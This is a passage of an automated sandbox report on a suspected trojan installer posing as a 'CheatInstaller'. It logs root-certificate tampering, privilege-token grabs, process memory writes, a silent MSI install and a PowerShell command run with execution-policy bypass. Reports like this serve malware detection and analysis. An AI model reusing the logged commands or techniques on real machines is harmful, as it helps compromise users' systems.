File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSICFA2.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID07E.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID214.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID35D.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f76c783.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f76c783.msi C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3064 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe
PID 3064 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe
PID 3064 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe
PID 3064 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe
PID 3064 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe
PID 3064 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe
PID 3064 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe
PID 2936 wrote to memory of 1580 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2936 wrote to memory of 1580 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2936 wrote to memory of 1580 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2936 wrote to memory of 1580 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2936 wrote to memory of 1580 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2936 wrote to memory of 1580 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2936 wrote to memory of 1580 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1916 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 1916 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 1916 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 1916 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 1916 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 1916 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 1916 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 2936 wrote to memory of 2560 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2936 wrote to memory of 2560 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2936 wrote to memory of 2560 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2936 wrote to memory of 2560 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2936 wrote to memory of 2560 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2936 wrote to memory of 2560 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2936 wrote to memory of 2560 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2560 wrote to memory of 748 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 2560 wrote to memory of 748 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 2560 wrote to memory of 748 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 2560 wrote to memory of 748 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\RUN.exe

"C:\Users\Admin\AppData\Local\Temp\RUN.exe"

C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe

.\Install_YTTCHTs.exe

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding A3DFC9C78531A8DB47A7D0FC4E91A4DD C

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi" /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1710532220 " ALLUSERS="1"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 3390BA477D202931038643805996ADD9

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssD4C0.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiD4AD.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrD4AE.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrD4AF.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

Network

Files

C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\es2015\text.js

MD5 12148d2dff9ca3478e4467945663fa70
SHA1 50998482c521255af2760ed95bbdb1c4f7387212
SHA256 1fb82c82d847ebc4aa287f481ff67c8cc9bde03149987b2d43eb0dee2a5160b6
SHA512 f9f6a61af37d1924e3a9785aa04a33fa0107791d54cb07663c6ea8a68edfae3766682e914b6afaf198eb97c7f73ab53aa500b4661cdabdebd2576526664166f4

C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\text.js

MD5 7b33dd38c0c08bf185f5480efdf9ab90
SHA1 b3d9d61ad3ab1f87712280265df367eff502ef8b
SHA256 d1e41c11aa11e125105d14c95d05e1e1acd3bede89429d3a1c12a71450318f88
